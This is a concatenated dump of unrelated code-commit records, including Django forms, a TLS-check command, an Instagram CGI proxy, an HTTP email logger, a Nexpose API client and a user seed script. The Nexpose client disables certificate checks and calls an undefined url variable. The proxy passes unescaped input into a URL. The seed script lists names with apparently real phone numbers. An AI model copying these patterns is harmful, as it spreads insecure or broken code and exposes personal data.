            # Skip the fully unfiltered combination (no location, no major).
            if location.condition == ' 1 = 1 ' and major.condition == ' 1 = 1 ':
                continue;
            table = select_table(conditions)
            name_file = 'hedu'+str(year.name)+str(location.name)+str(major.name)
            new_file_path = os.path.join(output_path, name_file+".csv.bz2")
            # Column lists are cached per table; each column is aliased to
            # its translated display name.
            if table not in table_columns.keys():
                table_columns[table] = [ i+" as '"+dic_lang[i]+"'" for i in common.get_colums(table, columns_deleted)]
            # NOTE(review): the LIMIT 5 below looks like a debugging
            # leftover -- confirm whether full exports are intended.
            query = 'SELECT '+','.join(table_columns[table])+' FROM '+table+' WHERE '+' and '.join(conditions) + ' LIMIT 5'
            logging.info('Query for file ('+str(datetime.now().hour)+':'+str(datetime.now().minute)+':'+str(datetime.now().second)+'): \n '+name_file+'\n'+query)
            print "Gerando ... " + new_file_path
            f = pd.read_sql_query(query, common.engine)
            f.to_csv(bz2.BZ2File(new_file_path, 'wb'), sep=",", index=False, float_format="%.3f", encoding='utf-8')
    logging.info("\nError:\n"+str(sys.stderr)+"\n-----------------------------------------------\n")
# A filter is a SQL WHERE fragment plus the suffix appended to the output
# file name for that slice.
Condition = namedtuple('Condition', ['condition', 'name'])
locations = [
    Condition(' 1 = 1 ', ''),
    Condition('bra_id_len=1', '-regions'),
    Condition('bra_id_len=3', '-states'),
    Condition('bra_id_len=5', '-mesoregions'),
    Condition('bra_id_len=7', '-microregions'),
    Condition('bra_id_len=9', '-municipalities')]
majors = [
    Condition(' 1 = 1 ', ''),
    Condition('course_hedu_id_len=2', '-field'),
    Condition('course_hedu_id_len=6', '-majors')]
# Command line: language ('pt'/'en'), output directory, year.
if len(sys.argv) != 4 or (sys.argv[1:][0] not in ['pt', 'en']):
    print "ERROR! use :\npython scripts/data_download/higher_education/create_files.py en/pt output_path year"
    exit()
output_path = os.path.abspath(sys.argv[2])
# Log file lives alongside the exported CSVs.
logging.basicConfig(filename=os.path.abspath(os.path.join(sys.argv[2],'higher-education-data-download.log' )),level=logging.DEBUG)
year = Condition('year='+str(sys.argv[3]), '-'+str(sys.argv[3]))
local_imports()
save(year=year, locations=locations, majors=majors, lang=sys.argv[1], output_path=output_path)
| Python | 0 | |
3de2e625af9047b64cc2718e6e79be0c428b6ae7 | Solve Code Fights extract each kth problem | CodeFights/extractEachKth.py | CodeFights/extractEachKth.py | #!/usr/local/bin/python
# Code Fights Extract Each Kth Problem
def extractEachKth(inputArray, k):
    """Return a copy of inputArray with every k-th element (1-based)
    removed."""
    kept = []
    for position, element in enumerate(inputArray, start=1):
        if position % k:
            kept.append(element)
    return kept
def main():
    """Run extractEachKth against the sample cases and report each result."""
    cases = [
        ([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3, [1, 2, 4, 5, 7, 8, 10]),
        ([1, 1, 1, 1, 1], 1, []),
        ([1, 2, 1, 2, 1, 2, 1, 2], 2, [1, 1, 1, 1]),
    ]
    for arr, k, expected in cases:
        actual = extractEachKth(arr, k)
        if actual == expected:
            print("PASSED: extractEachKth({}, {}) returned {}"
                  .format(arr, k, actual))
        else:
            print(("FAILED: extractEachKth({}, {}) returned {},"
                   "answer: {}").format(arr, k, actual, expected))


if __name__ == '__main__':
    main()
| Python | 0.000853 | |
0f1f96ce23ab89c8de3cf24645c4ea77fa2a9196 | add first test with random data | test_window.py | test_window.py | from telescope import LST
from windows import TelescopeEventView
import tkinter as tk
import numpy as np
# Build a dummy LST telescope at the origin and show two event viewers
# side by side, each filled with random "event" amplitudes.
lst = LST(0, 0, 0)
root = tk.Tk()
# NOTE(review): assumes lst.n_pixel is the camera pixel count expected by
# TelescopeEventView -- confirm against the telescope module.
viewer1 = TelescopeEventView(root, lst, np.random.normal(size=lst.n_pixel))
viewer2 = TelescopeEventView(root, lst, np.random.normal(size=lst.n_pixel))
viewer1.pack(side=tk.LEFT, expand=True, fill=tk.BOTH)
viewer2.pack(side=tk.LEFT, expand=True, fill=tk.BOTH)
# Blocks until the window is closed.
root.mainloop()
| Python | 0.000001 | |
60b5948508a67cb213ca04b5faacb77e27d8f84c | Add fields expicitly declared in form | samples/forms.py | samples/forms.py | import datetime #for checking renewal date range.
from django import forms
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from .models import (Patient, AdmissionNote, FluVaccine,
CollectionType, CollectedSample,
Symptom, ObservedSymptom,
)
from fiocruz.settings.base import DATE_INPUT_FORMATS
class AdmissionNoteForm(forms.ModelForm):
    # Admission-note form: only the originating GAL id is editable.
    class Meta:
        model = AdmissionNote
        fields = [
            'id_gal_origin',
        ]

class PatientForm(forms.ModelForm):
    # Minimal patient form exposing only the name.
    class Meta:
        model = Patient
        fields = [
            'name',
        ]

class FluVaccineForm(forms.ModelForm):
    # Date parsing follows the project-wide accepted input formats.
    date_applied = forms.DateField(input_formats=DATE_INPUT_FORMATS)

    class Meta:
        model = FluVaccine
        fields = ['was_applied', 'date_applied', ]
| import datetime #for checking renewal date range.
from django import forms
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from .models import (Patient, AdmissionNote, FluVaccine,
CollectionType, CollectedSample,
Symptom, ObservedSymptom,
)
from fiocruz.settings.base import DATE_INPUT_FORMATS
class AdmissionNoteForm(forms.ModelForm):
    # Admission-note form: only the originating GAL id is editable.
    class Meta:
        model = AdmissionNote
        fields = [
            'id_gal_origin',
        ]

class PatientForm(forms.ModelForm):
    # Minimal patient form exposing only the name.
    class Meta:
        model = Patient
        fields = [
            'name',
        ]

class FluVaccineForm(forms.ModelForm):
    # Date parsing follows the project-wide accepted input formats.
    date_applied = forms.DateField(input_formats=DATE_INPUT_FORMATS)

    class Meta:
        model = FluVaccine
        # Every model field except the admission_note FK is exposed.
        exclude = ['admission_note', ]
| Python | 0 |
5ca9e468b9709ae2c7358551a19e668e580ea396 | add deserialized json object validation functions | src/validate.py | src/validate.py | from collections import Counter
# Model types accepted by the metadata validators.
# BUGFIX: the original line had unbalanced brackets -- `set([...])])` --
# which is a SyntaxError; rewritten as a well-formed set.
modeltypes = set(["asymmetric_beta_bernoulli", "normal_inverse_gamma",
                  "pitmanyor_atom", "symmetric_dirichlet_discrete",
                  "poisson_gamma"])

def assert_map_consistency(map_1, map_2):
    """Assert that map_2 is the exact inverse mapping of map_1."""
    assert(len(map_1) == len(map_2))
    for key in map_1:
        assert(key == map_2[map_1[key]])

def assert_mc_consistency(mc):
    """Assert internal consistency of a deserialized M_c metadata dict:
    inverse name/index maps, one metadata entry per column, a known
    modeltype, and inverse value/code maps per column."""
    assert_map_consistency(mc["name_to_idx"], mc["idx_to_name"])
    assert(len(mc["name_to_idx"]) == len(mc["column_metadata"]))
    # BUGFIX: the original iterated over the undefined bare name
    # `column_metadata`; the list lives inside the mc dict.
    for column_metadata_i in mc["column_metadata"]:
        assert(column_metadata_i["modeltype"] in modeltypes)
        assert_map_consistency(column_metadata_i["value_to_code"],
                               column_metadata_i["code_to_value"])

def assert_mr_consistency(mr):
    """Assert internal consistency of a deserialized M_r metadata dict."""
    assert_map_consistency(mr["name_to_idx"], mr["idx_to_name"])
827828dc479f295e6051d69c919f5f1c97dcb6e2 | Add management command to verify MOTECH connection certificates. | corehq/motech/management/commands/verify_motech_connection_certs.py | corehq/motech/management/commands/verify_motech_connection_certs.py | from urllib.parse import urlparse, urlunparse
import requests
from django.core.management.base import BaseCommand
from requests.exceptions import SSLError
from corehq.motech.models import ConnectionSettings
from corehq.util.log import with_progress_bar
# Port implied by an https:// URL with no explicit port.
IMPLICIT_HTTPS_PORT = 443

class Command(BaseCommand):
    help = "Verify MOTECH connection certificates by performing an HTTP HEAD " \
           "request to all unique domains where the URL method == HTTPS and " \
           "SSL validation is enabled."

    def add_arguments(self, parser):
        parser.add_argument("-c", "--ca-bundle", metavar="FILE",
            help="Use a custom CA trust store for SSL verifications.")
        parser.add_argument("--connect-timeout", metavar="SECONDS", type=float,
            default=None, help="Use custom HTTP connection timeout value.")

    def handle(self, *args, **options):
        verbose = options["verbosity"] > 1
        timeout = options["connect_timeout"]
        castore = options["ca_bundle"]

        def debug(msg):
            # Chatty progress output, only with -v 2 or higher.
            if verbose:
                self.stdout.write(msg)

        # Map (hostname, port) -> root URL, deduplicating connections that
        # point at the same endpoint.
        netlocs = {}
        for connection in ConnectionSettings.objects.all():
            if connection.skip_cert_verify:
                debug(f"skipping (verify disabled): {connection.url}")
                continue
            urlparts = urlparse(connection.url)
            if urlparts.scheme == "https":
                hostname, x, port = urlparts.netloc.partition(":")
                if not port:
                    # Key URL dict by explicit port numbers to avoid duplicate
                    # hits on domains where multiple URLs exist, some with the
                    # port implied and others with port 443 set explicitly.
                    port = IMPLICIT_HTTPS_PORT
                root_url = urlunparse(("https", urlparts.netloc, "/", "", "", ""))
                netlocs.setdefault((hostname, int(port)), root_url)
            elif urlparts.scheme == "http":
                debug(f"skipping (non-SSL): {connection.url}")
            else:
                debug(f"skipping (unknown scheme): {connection.url}")
        # HEAD each unique root URL; SSL failures and other HTTP errors are
        # collected separately and summarised afterwards.
        errors = []
        failures = []
        urls = [v for (k, v) in sorted(netlocs.items())]
        for url in with_progress_bar(urls, oneline=(not verbose)):
            try:
                debug(f"HEAD {url}")
                requests.head(url, verify=(castore or True), timeout=timeout)
            except SSLError:
                failures.append(url)
            except requests.RequestException as exc:
                errors.append((url, str(exc)))
        if errors:
            self.stdout.write(f"{len(errors)} HTTP error(s):")
            for url, msg in errors:
                self.stderr.write(f"WARNING: {url} {msg}", self.style.NOTICE)
        if failures:
            self.stdout.write(f"{len(failures)} SSL verification failure(s):")
            for url in failures:
                self.stdout.write(f"FAIL: {url}", self.style.ERROR)
        # Final summary line, coloured by how many domains verified cleanly.
        total = len(urls)
        successes = total - (len(failures) + len(errors))
        final_msg = f"\nSuccessfully verified {successes} of {total} domain(s)"
        if total and not successes:
            style = self.style.ERROR
        elif total > successes:
            style = self.style.WARNING
        else:
            style = self.style.SUCCESS
        self.stdout.write(final_msg, style)
| Python | 0 | |
fc017a578a402b3d24523d1a41b7a4fdc0b107ef | add a starter proxy script | scripts/proxy.py | scripts/proxy.py | #!/usr/bin/env python
'''
Copyright (C) Kalan MacRow, 2013
This code is distributed with jquery.instagram.js
under the MIT license.
https://github.com/kmacrow/jquery.instagram.js
'''
import os
import cgi
import sys
import cgitb
import urllib2
# Base URL for Instagram API endpoints
# Base URL for Instagram API endpoints
INSTAGRAM_BASE = 'https://api.instagram.com/v1/'
# Add acceptable origins here...
ACCEPT_ORIGINS = ['http://localhost',
                  'http://localhost:8888',
                  'http://localhost:8080']
# Initialize CGI with JSON output
cgitb.enable()
form = cgi.FieldStorage()
print "Content-Type: application/json"
# Support cross origin resource sharing
origin = os.environ.get('HTTP_ORIGIN')
if origin in ACCEPT_ORIGINS:
    print "Access-Control-Allow-Origin: %s" % origin
# empty line after headers
print
client_id = form.getfirst('client_id', None)
tag_name = form.getfirst('tag', None)
if not client_id or not tag_name:
    print '{"error":"client_id and tag required."}'
    sys.exit(0)
# Get the data from Instagram
# NOTE(review): tag_name and client_id are interpolated un-escaped into the
# URL; consider urllib.quote unless inputs are known to be restricted.
stream = urllib2.urlopen(INSTAGRAM_BASE + 'tags/' + tag_name \
    + '/media/recent/?client_id=' + client_id)
print stream.read()
| Python | 0 | |
a319f2f1606a5c4d33e846b496e555140607c98d | Add track_name script | track_names.py | track_names.py | import midi
import sys
def track_name(track):
    """Return a MIDI track's name, taken from its TrackNameEvent.

    Falls back to a dump of the first 6 events when no name event exists.
    """
    for ev in track:
        if isinstance(ev, midi.TrackNameEvent):
            # Event data is a sequence of byte values; join them into text.
            return ''.join(map(chr, ev.data))
    name = 'no name, first 6 events:'
    for ev in track[:6]:
        name += '\n %s' % ev
    return name

def main(argv):
    # Print the number of tracks in the given MIDI file and each track's name.
    if len(argv) < 2:
        print 'usage: track_names.py file.mid'
        return
    mid = midi.read_midifile(argv[1])
    print '%d tracks' % len(mid)
    for i, t in enumerate(mid):
        print ' %03d: %s' % (i, track_name(t))

if __name__ == '__main__':
    main(sys.argv)
| Python | 0.000002 | |
877a7b7449a1d88c14633376a2dfaca8c619c26a | Add solution to exercis 3.6. | exercises/chapter_03/exercise_03_06/exercise_03_06.py | exercises/chapter_03/exercise_03_06/exercise_03_06.py | # 3-6 Guest List
# 3-6 Guest List: invite guests, handle a cancellation, then grow the table.
guest_list = ["Albert Einstein", "Isac Newton", "Marie Curie", "Galileo Galilei"]


def invite_everyone(guests):
    # One invitation line per guest, using the exercise's exact wording.
    for guest in guests:
        print("Hi " + guest + " you are invited to dinner at 7 on saturday.")


# First round of invitations.
invite_everyone(guest_list)

# One guest cancels and is replaced; everyone is re-invited.
print(guest_list[1] + " can not attend the dinner.")
guest_list[1] = "Charles Darwin"
invite_everyone(guest_list)

# A bigger table allows three more guests: front, middle and end of the list.
print("I have a bigger table now so three more people will be invited.")
guest_list.insert(0, "Stephen Hawking")
guest_list.insert(2, "Louis Pasteur")
guest_list.append("Nicolaus Copernicus")
invite_everyone(guest_list)
5c7538ca1e43eb4529c04169a9a15c513bc3e659 | Add segment_tangent_angle tests module | tests/plantcv/morphology/test_segment_tangent_angle.py | tests/plantcv/morphology/test_segment_tangent_angle.py | import pytest
import cv2
from plantcv.plantcv import outputs
from plantcv.plantcv.morphology import segment_tangent_angle
@pytest.mark.parametrize("size", [3, 100])
def test_segment_tangent_angle(size, morphology_test_data):
    """segment_tangent_angle should record one tangent angle per leaf
    segment, regardless of the tangent window size."""
    # Clear previous outputs
    outputs.clear()
    skel = cv2.imread(morphology_test_data.skel_img, -1)
    leaf_obj = morphology_test_data.load_segments(morphology_test_data.segments_file, "leaves")
    _ = segment_tangent_angle(segmented_img=skel, objects=leaf_obj, size=size)
    # The test fixture contains exactly 4 leaf segments.
    assert len(outputs.observations['default']['segment_tangent_angle']['value']) == 4
| Python | 0.000001 | |
6d2d224d246569a35a7b4ae5d8086e83bbb67155 | move server.py to project dir | server/server.py | server/server.py | from datetime import datetime
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
SERVER_PORT = 90
HOST_ADDRESS = ''
def save_data(user_email):
    """Append one registration record ("<email>, <timestamp>\\n") to
    users.txt and log it to stdout.

    BUGFIX: the original opened the file without ever closing it; the
    `with` block guarantees the handle is flushed and released.
    """
    current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    with open('users.txt', 'a+') as record_file:
        record_file.write("{}, {}\n".format(user_email, current_time))
    print("save {}".format(user_email))
def get_json(data):
    """Parse *data* as JSON; malformed input yields an empty list."""
    try:
        parsed = json.loads(data)
    except ValueError:
        # Ignore everything the client sent if it is not valid JSON.
        return []
    return parsed
class S(BaseHTTPRequestHandler):
    """Tiny JSON registration endpoint.

    GET/HEAD answer with a static payload; POST expects a JSON body with
    an "email" key and appends the address to users.txt via save_data.
    """

    def _set_headers(self):
        # Common 200/JSON response header used by every verb.
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()

    def do_GET(self):
        self._set_headers()
        self.wfile.write("{\"hello\":\"friend\"}".encode("utf-8"))

    def do_HEAD(self):
        self._set_headers()

    def do_POST(self):
        content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
        post_data_str = self.rfile.read(content_length).decode()
        post_data_json = get_json(post_data_str)
        email_key = "email"
        # if client didn't send email as param
        # (get_json returns [] for malformed JSON, so the membership test
        # below also safely yields False in that case)
        user_email = post_data_json[email_key] if email_key in post_data_json else None
        self._set_headers()
        if user_email is not None:
            save_data(user_email)
            self.wfile.write("{\"successfully\":\"registered\"}".encode("utf-8"))
        else:
            self.wfile.write("{\"error\":\"invalid request\"}".encode("utf-8"))
def run(server_class=HTTPServer, handler_class=S, port=SERVER_PORT):
    """Bind the HTTP server on (HOST_ADDRESS, port) and serve forever.

    This call blocks until the process is interrupted.
    """
    server_address = (HOST_ADDRESS, port)
    httpd = server_class(server_address, handler_class)
    print('Starting httpd...')
    httpd.serve_forever()


if __name__ == '__main__':
    # Guarded so importing this module does not start the server
    # (the original called run() unconditionally at import time).
    run()
| Python | 0 | |
a8db8c0448d98e2de0e662581542bd644e673c7c | Add migration removing generated objects with factories | geotrek/core/migrations/0018_remove_other_objects_from_factories.py | geotrek/core/migrations/0018_remove_other_objects_from_factories.py | # Generated by Django 2.0.13 on 2020-04-06 13:40
from django.conf import settings
from django.contrib.gis.geos import Point, LineString
from django.db import migrations
def remove_generated_objects_factories(apps, schema_editor):
    """Delete leftover Comfort / PathSource / Stake rows created by test
    factories: rows whose label matches the "<ModelName> <n>" factory
    pattern and that are not attached to any path.
    """
    ComfortModel = apps.get_model('core', 'Comfort')
    PathSourceModel = apps.get_model('core', 'PathSource')
    StakeModel = apps.get_model('core', 'Stake')
    ComfortModel.objects.filter(paths__isnull=True, comfort__icontains="Comfort ").delete()
    # BUGFIX: the original filtered PathSource and Stake on a non-existent
    # `comfort` field (copy/paste from the line above), which would raise
    # FieldError when the migration runs; use each model's own label field.
    PathSourceModel.objects.filter(paths__isnull=True, source__icontains="PathSource ").delete()
    StakeModel.objects.filter(paths__isnull=True, stake__icontains="Stake ").delete()
class Migration(migrations.Migration):
    # One-off data migration running the cleanup above; no reverse
    # operation is provided, so it cannot be unapplied.

    dependencies = [
        ('core', '0017_remove_path_from_factories'),
    ]

    operations = [
        migrations.RunPython(remove_generated_objects_factories)
    ]
| Python | 0 | |
3ddf1f4a2bcae247978b66fd63848b3ed9782234 | add donwloader | MistDownloader.py | MistDownloader.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib
import os
import time
import sys
import traceback
# Download the MP3s listed in the outdir/mp3_url_* index files into ./mp3,
# skipping songs below the optional play-count threshold given as argv[1].
cnt=0
least_cnt=0
if len(sys.argv)==2:
    least_cnt=int(sys.argv[1])
    print least_cnt
if not os.path.exists("mp3"):
    os.mkdir("mp3")
for path,dirname,filenames in os.walk("outdir"):
    for filename in filenames:
        if filename.startswith("mp3_url_"):
            cnt+=1
            if cnt%100==0:
                print ("Has already downloaded %d songs!" % cnt)
            f=open("outdir/"+filename)
            # Each index line: "<song id> <play count> <url>".
            for line in f:
                values=line.split()
                if len(values)!=3:
                    sys.stderr.write("Bad line '%s' in file %s\n" % (line,filename))
                sid=values[0]
                play_cnt=int(values[1])
                url=values[2]
                if play_cnt<least_cnt:
                    continue
                fn="mp3/%s.mp3" % sid
                # Never re-download a file that already exists.
                if not os.path.exists(fn):
                    try:
                        urllib.urlretrieve(url, fn)
                        print(sid)
                    except Exception as e:
                        exc_type, exc_value, exc_traceback = sys.exc_info()
                        traceback.print_exception(exc_type, exc_value, exc_traceback,limit=None, file=sys.stderr)
                    # Throttle between downloads to be polite to the server.
                    time.sleep(2)
            f.close()
| Python | 0.000014 | |
5f91091456931ed7e95e8aa05ad53134f5784f60 | Create summary_plot.py | summary_plot.py | summary_plot.py | ## script to plot the output
## from fermipy,given a .npy file
## Sara Buson, Oct. 2017
## very basic, need to implement better
## the reading of png, laoding the npy
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
import sys
from matplotlib.cbook import get_sample_data
import matplotlib.image as mpimg
def getLCdata(lc,f_scale,ts=''):
    """Load a fermipy light-curve .npy file and return the plot arrays.

    Bins with TS below the threshold are flagged in the returned
    `condition` mask (drawn as upper limits) and their npred is zeroed.
    """
    # Default TS threshold; the '' default only works under Python 2's
    # mixed-type comparison rules.
    if not ts>-10: ts=25
    print ts
    """ -- reading the LC output --- """
    # Source name is derived from the file name.
    s=lc.split('/')
    src=s[-1].split('_lightcurve.npy')[0]
    o = np.load(lc).flat[0]
    _ts = o['ts']
    mjd=o['tmin_mjd']
    mjd_width = mjd[1]-mjd[0]
    mjd_middle=mjd+mjd_width
    flux=o['flux']/f_scale
    flux_err=o['flux_err']/f_scale
    ul = o['flux100_ul95']/f_scale
    #ul_er = 0. /f_scale
    N_pred=o['npred']
    bin_qual= o['fit_quality']
    condition=_ts<ts #array of True/False
    #x=np.where(condition) #array of positions where condition is True
    # NOTE(review): y and ye are computed but never returned -- the raw
    # flux/flux_err arrays are returned instead; confirm intent.
    y = [ (ul[i] if condition[i] else flux[i]) for i in xrange(len(mjd_middle)) ]
    ye =[ (np.array(flux_err).mean() if condition[i] else flux_err[i]) for i in xrange(len(mjd_middle)) ]
    npred=[ ( 0 if condition[i] else N_pred[i]) for i in xrange(len(mjd_middle)) ]
    ## need to implement the key in fermipy
    #index = [ (0 if condition[i] else Ind[i]) for i in xrange(len(mjd_middle)) ]
    #indexe =[ (0 if condition[i] else Inde[i]) for i in xrange(len(mjd_middle)) ]
    return src,mjd_middle, mjd_width, flux, flux_err, ul, npred, bin_qual, condition
def plotLC(lc, ts='',f_scale=1e-8, where='./',save=False):
    """Assemble the summary figure: light curve across the top row, then
    npred diagnostics, the TS-map image and the SED image below."""
    plt.rcParams['legend.handlelength'] = 2.4
    plt.rcParams['legend.numpoints'] = 1
    plt.rcParams['legend.handletextpad']=0.9
    plt.rcParams['legend.markerscale']=0
    #plt.rcParams['lines.linewidth']=0
    # Figure margins/spacing, applied via subplots_adjust at the end.
    left = 0.075 # the left side of the subplots of the figure
    right = 0.975 # the right side of the subplots of the figure
    bottom = 0.06 # the bottom of the subplots of the figure
    top = 0.95 # the top of the subplots of the figure
    wspace = 0.08 # the amount of width reserved for blank space between subplots
    hspace = 0.3 # the amount of height reserved for white space between subplots
    grid_size = (2, 3)
    fig, axs = plt.subplots(nrows=2, ncols=3, sharex=False,figsize=(12,8))
    """ FERMIPY LC """
    #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
    """ -- reading the LC output in separete function --- """
    f_scale_label=str(f_scale).split('-0')[-1]
    ax0 =plt.subplot2grid(grid_size, (0, 0), rowspan=1, colspan=3) ## <<--------
    ax0.set_ylabel('[$10^{-%s} ph cm^{-2} s^{-1}$]'%f_scale_label)
    ax0.set_xlabel('Time [MJD]')
    ax0.grid()
    src,mjd_middle, mjd_width, flux, fluxerr, ul, N_pred,bin_qual, lolims = getLCdata(lc,f_scale,ts=ts)
    # Low-TS bins come back flagged in `lolims` and are drawn as limits.
    plt.errorbar(mjd_middle,flux, xerr=mjd_width, yerr=fluxerr, uplims=lolims,
                 color='green',marker='o',markersize=4,ls='none',label='%s (%i-day binning; TS>%.1f)'%(src,mjd_width,ts))
    ## coming..
    ## to be included if the Sun is within the ROI
    ## plt. plot([timeSun0,timeSun0],[0,5], label='SUN',ls='dashed', c='red',linewidth=2.0)
    leg0 = ax0.legend()
    plt.legend(loc='upper left')
    ax0.axes.get_xaxis().set_visible(True)
    ## HERE PLOT NPRED // QUALITY
    ax1 =plt.subplot2grid(grid_size, (1, 0), rowspan=1, colspan=1) ## <<--------
    ax1.set_ylabel('Flux/Flux_err')
    ax1.set_xlabel('Npred/sqrt(Npred)')
    #ax1.set_xlim(lt,rt)
    #ax1.set_ylim(-0.01,3)
    ax1.grid()
    ratio_F_Fe= flux/fluxerr
    ratio_Npred= N_pred/np.sqrt(N_pred)
    plt.errorbar(ratio_Npred, ratio_F_Fe, xerr=0, yerr=0, uplims=False,
                 color='orange',marker='o',markersize=4,ls='none',label='')#,xnewF, F_(xnewF),'-',xnewF1, F_(xnewF1),'-',lw=2,label='LAT',color='green')#, xnew, f2(xnew), '--')
    ## coming..
    ## to be included if the Sun is within the ROI
    ## plt. plot([timeSun0,timeSun0],[0,5], label='SUN',ls='dashed', c='red',linewidth=2.0)
    leg1 = ax1.legend()
    plt.legend(loc='upper left')
    ax1.axes.get_xaxis().set_visible(True)
    ## HERE PLOT TSMAP
    # NOTE(review): image file names below assume fermipy's default output
    # naming inside `where` -- confirm for non-default configurations.
    what='pointsource_powerlaw_2.00_tsmap_sqrt_ts.png'
    img=mpimg.imread(where+what)
    newax = plt.subplot2grid(grid_size, (1, 1), rowspan=1, colspan=1)
    imgplot = plt.imshow(img)
    newax.imshow(img)
    newax.axis('off')
    ## HERE PLOT SED
    what='%s_sed.png'%src
    img_sed = plt.imread(where+what)
    newax = plt.subplot2grid(grid_size, (1, 2), rowspan=1, colspan=1)
    imgplot = plt.imshow(img_sed)
    newax.axis('off')
    plt.subplots_adjust(left=left, bottom=bottom, right=right, top=top,
                        wspace=wspace, hspace=hspace)
    if save==True: plt.savefig('%s_summary.pdf'%src,transparent=True)
    plt.show()

if __name__ == "__main__":
    #try:
    # NOTE(review): sys.argv[2] raises IndexError when the TS argument is
    # omitted; the commented-out try/except below used to guard this.
    lcfile=sys.argv[1]
    if sys.argv[2]: TS=float(sys.argv[2])
    plotLC(lcfile,ts=TS,save=True)
    #except: print 'usage:: python LC_file.npy ts'
| Python | 0.000067 | |
54e3d3147feb33f21c5bc78a8f3b4721574fcbb9 | Create A.py | Google-Code-Jam/2017-1B/A.py | Google-Code-Jam/2017-1B/A.py | import os
import sys
# Discover the newest input file next to this script, preferring the
# large over the small over the test data set, then solve Code Jam 2017
# Round 1B problem A ("Steed 2: Cruise Control") for each case.
script = __file__
scriptPath = os.path.dirname(script)
# First character of the script name ('A') keys the matching data files.
scriptFile = os.path.basename(script)[0]
# NOTE(review): when run as "python A.py" from its own directory,
# scriptPath is '' and os.listdir('') raises -- confirm invocation style.
files = [f for f in os.listdir(scriptPath) if scriptFile in f and '.in' in f]
if '{}-large'.format(scriptFile) in str(files):
    size = 'large'
elif '{}-small'.format(scriptFile) in str(files):
    size = 'small'
elif '{}-test'.format(scriptFile) in str(files):
    size = 'test'
else:
    print('{}-test not found'.format(scriptFile))
    sys.exit()
# Newest matching file, with the '.in' extension stripped.
latest = sorted(f for f in files if size in f)[-1][:-3]
F = '{}/{}'.format(scriptPath, latest)
I = open(F + '.in', 'r')
O = open(F + '.out', 'w')
print(F)
T = int(I.readline()) # nb of test cases
# https://code.google.com/codejam/contest/8294486/dashboard
# Problem A.
for x in range(T):
    D, N = map(int, I.readline().rstrip().split())
    horses = [tuple(map(int, I.readline().split())) for _ in range(N)]
    # The last horse to reach D sets the pace; Annie's best speed is the
    # track length divided by that slowest arrival time.
    slowpoke = max((D-K)/S for K, S in horses)
    y = D/slowpoke
    result = '{}Case #{}: {}'.format('\n' if x else '', x + 1, y)
    print(result)
    O.write(result)
I.close()
O.close()
| Python | 0.000004 | |
607bd42a40b8f9909e3d889b6b9011b4d14a4e52 | add nexpose.py | nexpose.py | nexpose.py | #!/usr/bin/python3
import xml.etree.ElementTree as etree
import urllib.request
import urllib.parse
import sys
import ssl
__author__ = 'Nick Levesque <nick@portcanary.com>'
# Nexpose API wrapper.
class Nexpose:
def __init__(self, hostname, port):
self.hostname = hostname
self.port = port
self.url = 'https://%s:%s/api/1.2/xml' % (self.hostname, self.port)
self.session_id = None
# Often the Nexpose Console is run with a self-signed cert. We allow for that here.
self.ctx = ssl.create_default_context()
self.ctx.check_hostname = False
self.ctx.verify_mode = ssl.CERT_NONE
# Generic API request, feed it an xml string and off it goes.
def api_request(self, xml_string):
# Encode the xml so that urllib will accept it.
post_data = (xml_string).encode('utf-8')
# Prepare the request.
request = urllib.request.Request(url)
request.add_header("Content-type", "text/xml")
# Get a response.
response = urllib.request.urlopen(request, post_data, context=self.ctx).read()
xml_response = etree.fromstring(response)
# Check for errors and return response.
if not xml_response.tag == 'Failure':
return response
else:
for exception in xml_response.iter('Exception'):
for message in exception.iter('Message'):
return str("Failure: " + message.text)
# Login function, we must capture the session-id contained in the response if successful.
def login(self, username, password):
# Encode the login request string so that urllib will accept it.
xml_string = "<LoginRequest user-id=\"%s\" password=\"%s\" />" % (username, password)
post_data = (xml_string).encode('utf-8')
# Prepare the request
request = urllib.request.Request(self.url)
request.add_header("Content-type", "text/xml")
# Get a response
response = urllib.request.urlopen(request, post_data, context=self.ctx).read()
xml_response = etree.fromstring(response)
# Check for errors and set session-id.
if not xml_response.tag == 'Failure':
self.session_id = xml_response.attrib.get('session-id')
else:
for exception in xml_response.iter('Exception'):
for message in exception.iter('Message'):
return str("Failure: " + message.text)
def logout(self):
# Encode the logout request string so that urllib will accept it.
xml_string = "<LogoutRequest session-id=\"%s\" />" % (self.session_id)
post_data = (xml_string).encode('utf-8')
# Prepare the request.
request = urllib.request.Request(self.url)
request.add_header("Content-type", "text/xml")
# Get a response.
response = urllib.request.urlopen(request, post_data, context=self.ctx).read()
xml_response = etree.fromstring(response)
# Check for errors.
if not xml_response.tag == 'Failure':
pass
else:
for exception in xml_response.iter('Exception'):
for message in exception.iter('Message'):
return str("Failure: " + message.text)
if __name__ == '__main__':
    # Usage: ./nexpose.py hostname port username password
    host, port, user, secret = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
    client = Nexpose(host, port)
    error = client.login(user, secret)
    if error:
        print(error)
    if client.session_id:
        print(client.session_id)
        client.logout()
| Python | 0.000001 | |
a067c18f8534d79a85538eaf11e34e99f9e17286 | develop update to pair master, going to rename master now | oh_shit.py | oh_shit.py | from app import app, db
from app.mod_sms.models import *

# Seed script: create two user groups and their members, then persist them.
group_canyon = UserGroup(name='Canyon Time', phone='+17868378095', active=True)
group_test = UserGroup(name='test', phone='+18503783607', active=True)

ryan = User(fname='Ryan', lname='Kuhl', phone='+13058985985', active=True)
simon = User(fname='Simon', lname='', phone='+13109264989', active=True)
dan = User(fname='Dan', lname='Malik', phone='+14152718694', active=True)
tom = User(fname='Tom', lname='Scorer', phone='+13109022760', active=True)
steve = User(fname='Steve', lname='Makuch', phone='+16164609893', active=True)
chris = User(fname='Chris', lname='', phone='+16269882527', active=True)
ben = User(fname='Ben', lname='Eisenbise', phone='+13234017625', active=True)
alex = User(fname='Alex', lname='Thorpe', phone='+14243869550', active=True)

# Everyone belongs to "Canyon Time"; only Ryan belongs to the test group.
members = [ryan, simon, dan, tom, steve, chris, ben, alex]
for member in members:
    group_canyon.groups_to_users.append(member)
